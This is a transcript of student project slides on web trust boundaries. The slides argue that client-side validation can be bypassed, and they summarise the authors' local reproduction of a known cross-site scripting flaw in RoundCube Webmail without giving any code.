Careless Delegation of Trust
Download
Report
Transcript Careless Delegation of Trust
Web Trust Boundaries and
Security Vulnerabilities
Haris Volos and Hidayat Teonadi
CS739 – Distributed Systems
Problem
• Web of Trust
– Web crosses many trust boundaries
• To avoid Careless Delegation of Trust
should follow principles:
– Be specific
• Who is in your trusted group?
• What actions do we trust them to take?
– Be careful
• Bad design example
– A server offloads work to a client that “trusts”,
but client is either malicious or is bypassed.
2
Starting point...Java Applets
• Hypothesis
– Applets perform computation on client
browser on behalf of the server.
• Using a web crawler (Larbin), we sought
for Java applets.
– Besides Java chat applications, other results
seem uninteresting.
• Conclusion
– Applets usage is not rampant.
3
Web Apps & JavaScript
• Interactive Web Applications
– Main app resides in server-side (Servlet)
– Use JavaScript for client-side computation
• Example: input data validation
• Robust Web Applications
– JavaScript can be easily circumvented.
• Can be just disabled by browsers.
– Never rely solely on JavaScript client-side
validation.
4
Security Vulnerabilities
• Prevalent, because web apps cross trust
boundaries
• A malicious user will try to exploit these
• Web app must protect itself
– Is cryptography enough? No!
– Must validate any data that crosses the trust
boundary
• Example Vulnerabilities
– Cross site scripting, SQL Injection
5
Case Study: RoundCube Webmail
• RoundCube Webmail is a browser based IMAP client.
Uses a backend Apache/PHP/MySQL.
• RSnake from ha.ckers.org exposed a type 1 cross site
scripting (XSS) vulnerability
– Type-1 XSS: allows foreign code injection into a server
generated dynamic page.
– Exploit scenario: malicious script can silently obtain sensitive
credentials in the form of cookies.
• We managed to reproduce the XSS vulnerability locally.
• Realized how seemingly adequate server-side validation
can still be circumvented.
6
Next Step
• Study trust boundary more broadly
• Find more web applications
• Use a Web Vulnerability Scanner (e.g.
Gamja) to guide search
– Expose vulnerabilities
– Study them, and
– Propose some corrections
7